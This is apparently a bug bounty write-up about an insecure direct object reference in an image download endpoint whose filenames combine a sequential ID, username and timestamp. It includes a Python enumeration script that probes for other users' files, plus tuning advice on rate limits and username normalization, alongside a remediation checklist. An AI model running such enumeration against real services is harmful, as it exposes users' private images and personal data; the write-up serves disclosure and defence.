How a Simple Image Download Feature Became a Full IDOR Enumeration Attack

December 14, 2025

A real-world bug bounty case study showing how a simple image downloader exposed user data through predictable identifiers, leading to an enumeration-based IDOR.




⚠️ Disclaimer

This write-up is educational and defensive. All testing described was performed with permission or on controlled accounts. Do not test targets you do not own or for which you lack explicit authorization.


Introduction

Ordinary features are where the best bugs hide. A background-image removal tool, a temporary storage bucket, a simple “download processed image” link - none of these sound dangerous on their own. But when an application uses predictable filenames and serves files without ownership checks, the result is a classic Insecure Direct Object Reference (IDOR) with realistic, automated exploitation potential.

This post reconstructs a real bug bounty case: how an image download endpoint with a single docName parameter turned into a scalable IDOR. The researchers turned a casual curiosity into a repeatable proof-of-concept by reverse-engineering filename structure, building a controlled enumerator, and validating the ability to retrieve other users’ images.

This is written in a neutral, third-person style suitable for engineering teams, bug hunters, and security reviewers. It focuses on reproducible defensive lessons rather than serving as a how-to for attackers.


Background: the feature and the initial finding

The application provided an endpoint to download processed images:

GET /ImageDownload/?docName=620239_Researcher_1760364775.jpeg HTTP/1.1
Host: redacted.com
Accept: image/jpeg
Cookie: <user-session>

Casual testing showed the endpoint returned the requested file directly. A simple three-step experiment outlined the problem's contours:

  1. Upload image under Account A - get filename A.
  2. Upload image under Account B - get filename B.
  3. Substitute filename B into the download URL while authenticated as Account A - the server returned Account B’s image.

Conclusion: the server did not verify that the requesting user owned the docName resource.

At this point the bug was an IDOR candidate. Triage asked a reasonable question: “How would an attacker obtain other users’ filenames?” Answering that required pattern analysis and enumeration.

[Figure: IDOR attack flow - a browser's GET request parameter is manipulated to fetch another user's image from the server.]


Step 1 - Pattern discovery: what is docName made of?

To move from a simple IDOR into an exploit-ready case, the researchers focused on filename patterns. By uploading multiple images and collecting filenames, they identified a stable template:

<id>_<username>_<unix_timestamp>.jpeg

Typical example:

620239_Researcher_1760364775.jpeg

Breaking down the components:

  • id - 6-digit decimal, sequential (incrementing with uploads/accounts).
  • username - the account’s display name as provided at signup.
  • unix_timestamp - numeric seconds since epoch, matching upload time.

Each component is predictable (sequential id; known or guessable username; timestamp in a bounded window). That combination removes the “random secret” assumption and makes brute-forcing feasible.
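A template like this can be captured with a short parser. The sketch below is hypothetical code (not from the original report) showing the first step of such pattern analysis: splitting a docName into its three predictable components.

```python
import re
from datetime import datetime, timezone

# Matches the observed template: <id>_<username>_<unix_timestamp>.jpeg
FILENAME_RE = re.compile(r"^(\d{6})_(.+)_(\d{10})\.jpeg$")

def parse_docname(docname):
    """Split a docName into its predictable components, or return None."""
    m = FILENAME_RE.match(docname)
    if m is None:
        return None
    uid, username, ts = m.groups()
    return {
        "id": int(uid),
        "username": username,
        # Unix timestamp resolved to an absolute upload time
        "uploaded_at": datetime.fromtimestamp(int(ts), tz=timezone.utc),
    }

parsed = parse_docname("620239_Researcher_1760364775.jpeg")
```

Once a handful of uploaded filenames all parse cleanly against the same regex, the "random secret" assumption is effectively disproven.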

[Figure: Filename structure broken into its parts - user ID, username, and Unix timestamp.]


Step 2 - Designing an enumeration strategy

With the pattern identified, the goal was to prove real-world feasibility without causing harm.

Constraints and assumptions:

  • Files persist for 30 days. This gives time windows for enumeration.
  • IDs increment globally (or per tenant) - enabling backward enumeration from recent uploads.
  • Usernames are often discoverable or guessable (public profiles, marketing pages, simple derivation).

Enumeration approach:

  1. Start with recent high ID values and iterate downward (IDs likely to correspond to recent uploads).
  2. Generate username candidates: known public names, simple transformations (lowercase, remove spaces), and common names for the site.
  3. Create timestamp windows: assume upload occurred within a plausible range (e.g., last 72 hours) and iterate timestamps at coarse granularity first, refine when needed.
  4. Lightweight checks: send HTTP HEAD or small GET requests to validate availability without downloading massive content. Treat 200 OK as valid and 404 as not found. Rate-limit and respect service constraints.

This approach trades breadth for targeted, logic-driven probing to minimize noise and false positives.
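The candidate space implied by steps 1-3 can be generated lazily with no network activity at all. The function below is a hypothetical sketch of that logic; the bounds and step sizes are illustrative, not the researchers' actual values.

```python
from itertools import product

def candidate_docnames(id_hi, id_lo, usernames, ts_end, window_s=3600, step_s=60):
    """Yield candidate filenames: recent IDs first, coarse timestamp grid.

    id_hi/id_lo bound the descending sequential-ID sweep; usernames is a
    small list of plausible spellings; timestamps cover
    [ts_end - window_s, ts_end] at step_s resolution.
    """
    ids = range(id_hi, id_lo, -1)                       # newest uploads first
    timestamps = range(ts_end - window_s, ts_end + 1, step_s)
    for uid, name, ts in product(ids, usernames, timestamps):
        yield f"{uid}_{name}_{ts}.jpeg"

# Tiny illustrative run: 2 IDs x 1 username x 3 timestamps = 6 candidates
cands = list(candidate_docnames(620241, 620239, ["Researcher"],
                                ts_end=1760364780, window_s=120, step_s=60))
```

Because the generator is lazy, the probing loop can stop as soon as a hit is confirmed, keeping the request count proportional to what the test actually needs.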


Step 3 - Implementing the controlled prover (safe PoC)

The researchers wrote a small enumerator script (conceptual flow shown here; do not run against in-scope systems without permission):

# Conceptual pseudo-code for a controlled prover; run only against systems
# you are explicitly authorized to test. This is *not* a distributed
# bruteforce; it demonstrates the logic only.

from time import time, sleep

import requests  # third-party dependency: pip install requests

def try_filename(base_url, fname, session_cookie):
    # HEAD keeps the probe lightweight; 200 means the file is served to this session
    url = base_url + "?docName=" + fname
    r = requests.head(url, cookies={'session': session_cookie}, timeout=5)
    return r.status_code == 200

now = int(time())

# iterate recent IDs backwards (most recent uploads first)
for uid in range(620300, 620200, -1):
    for username in ['Researcher', 'Researcher01', 'Researcher_1']:
        # minute-granularity sweep over the last 72 hours
        for ts in range(now - 3600 * 72, now, 60):
            fname = f"{uid}_{username}_{ts}.jpeg"
            sleep(1)  # throttle every request, not only hits
            if try_filename("https://redacted.com/ImageDownload/", fname, "<test-session>"):
                print("Found:", fname)

The script keeps the search responsible by focusing on small windows and throttling every request. The real testing used more sophisticated heuristics to reduce requests and false positives and to avoid impact.

[Figure: Terminal output of the throttled enumeration script slowly discovering filenames.]


Step 4 - Practical barriers, false positives & tuning

Enumeration is noisy if performed naively. The team encountered and mitigated several issues:

  • False 404/200 behaviors: some filenames returned 200 but were placeholder images; validating content-length and HTTP headers helps.
  • Timestamp resolution: matching exact second can be hard; using minute-level windows and then refining produced better results.
  • Username normalization: spaces, case, and diacritics vary; the server's canonicalization rules had to be discovered by testing different transformations.
  • Rate limiting & detection: aggressive scans triggered defenses; the final PoC respected rate limits and included backoff.
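The username-normalization hurdle in particular lends itself to a small variant generator. The sketch below is hypothetical; the transformations a given server actually applies would have to be confirmed by testing.

```python
import unicodedata

def username_variants(display_name):
    """Generate plausible canonical forms of a display name.

    Covers the transformations that commonly matter: case folding,
    space removal/replacement, and diacritic stripping.
    """
    # Strip accents: decompose to NFKD, then drop combining marks
    ascii_name = unicodedata.normalize("NFKD", display_name)
    ascii_name = "".join(ch for ch in ascii_name if not unicodedata.combining(ch))
    forms = {
        display_name,
        display_name.lower(),
        display_name.replace(" ", ""),
        display_name.replace(" ", "_"),
        ascii_name,
        ascii_name.lower().replace(" ", ""),
    }
    return sorted(forms)

variants = username_variants("José Díaz")
```

Feeding each variant through the candidate generator, one at a time, narrows down which canonicalization the server uses with only a handful of probes.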

After several iterations, the PoC reliably discovered real, accessible filenames belonging to other accounts - validating the attack path.


Impact assessment

Why is this more than a “toy” bug?

  • Sensitive content: user-uploaded images can contain faces, IDs, documents - high-value PII.
  • Volume: with automation and thirty-day retention, thousands of images can be enumerated.
  • Ease of exploitation: attacker needs no special privileges, only predictable patterns and a legit account.
  • Chaining potential: exposed images could be used for targeted phishing, blackmail, or social engineering.

CVSS-style considerations (illustrative):

  • Authentication: required (low barrier if account creation is easy).
  • Complexity: low–medium (pattern analysis + automation).
  • Impact: High on confidentiality for exposed images.

Remediation checklist (developer playbook)

Fixes should be layered.

  1. Authorize every download

    • Do not accept client-supplied filenames as an authorization token. Map server-side IDs or tokens to owners and enforce checks.
  2. Use unguessable identifiers

    • Replace predictable filenames with cryptographically random names (UUIDs or random hash strings) unrelated to user data.
  3. Keep file metadata on the server

    • Store { file_id, owner_user_id, original_filename, upload_time } and serve only via GET /download/<file_id> after authorization.
  4. Shorten retention when possible

    • Only retain files as long as necessary and purge expired objects promptly.
  5. Rate-limit and monitor

    • Detect patterns of enumeration: many 404s for sequential IDs or timestamp sweeps.
  6. Content access tokens

    • For temporary public access, generate signed, time-limited URLs (one-time tokens) that map to a specific owner and expire quickly.
  7. Avoid embedding sensitive data in filenames

    • Never include usernames or PII inside storage object names.
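Items 1 and 6 above can be combined into a single mechanism. The sketch below (hypothetical names and parameters, not the vendor's fix) signs a time-limited download URL with HMAC and re-verifies it before serving, so a client-supplied filename never acts as authorization.

```python
import hashlib
import hmac
import secrets
import time

SECRET_KEY = secrets.token_bytes(32)  # server-side signing key (hypothetical)

def sign_download_url(file_id, owner_id, ttl_s=300):
    """Return a signed, time-limited download path bound to one owner."""
    expires = int(time.time()) + ttl_s
    payload = f"{file_id}:{owner_id}:{expires}"
    sig = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"/download/{file_id}?owner={owner_id}&expires={expires}&sig={sig}"

def verify_download(file_id, owner_id, expires, sig):
    """Reject expired or tampered links before any file is served."""
    if int(expires) < time.time():
        return False
    payload = f"{file_id}:{owner_id}:{expires}"
    expected = hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, sig)

url = sign_download_url("f3a9c2d1", owner_id=42)

# The handler re-derives the signature from the query parameters before serving
_, query = url.split("?")
params = dict(p.split("=") for p in query.split("&"))
ok = verify_download("f3a9c2d1", params["owner"], params["expires"], params["sig"])
```

Because the owner ID is inside the signed payload, substituting someone else's identifier invalidates the signature; enumeration of the token itself is defeated by the random signing key rather than by filename obscurity.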

[Figure: Remediation checklist - authorize, randomize, server-side metadata, retention, rate-limiting, and signed URLs.]


For bug hunters: responsible reporting tips

When you report this class of issue, include:

  • Clear reproduction steps using test accounts (never include real victim data).
  • Evidence of pattern predictability (non-sensitive sample filenames from your own uploads).
  • A concise impact statement: number of objects, retention window, type of likely content.
  • Suggested remediation (server-side mapping, random IDs, authorization checks).

Polite, concrete reports accelerate triage and fixes.


Closing thoughts

Boring endpoints can be dangerous endpoints. This case demonstrates how predictable identifiers + lax authorization create a high-confidence, automatable IDOR. The fix is conceptually simple - authorize, randomize, and minimize exposure - but it requires discipline in design and implementation.

For defenders: treat every user-controlled identifier as untrusted.
For hunters: patient pattern analysis and respectful, well-documented reporting are the keys to turning a curiosity into impact.


References & acknowledgements

  • Case study reconstructed from an anonymized bug bounty write-up and the researcher’s responsibly disclosed report.
  • General IDOR guidance: OWASP Top 10 - Broken Access Control.
  • Practical tips based on common secure file-handling best practices.

Herish Chaniyara

Web Application Penetration Tester (VAPT) & Security Researcher. A Gold Microsoft Student Ambassador and PortSwigger Hall of Fame (#59) member dedicated to securing the web.


For any queries or professional discussions: herish.chaniyara@gmail.com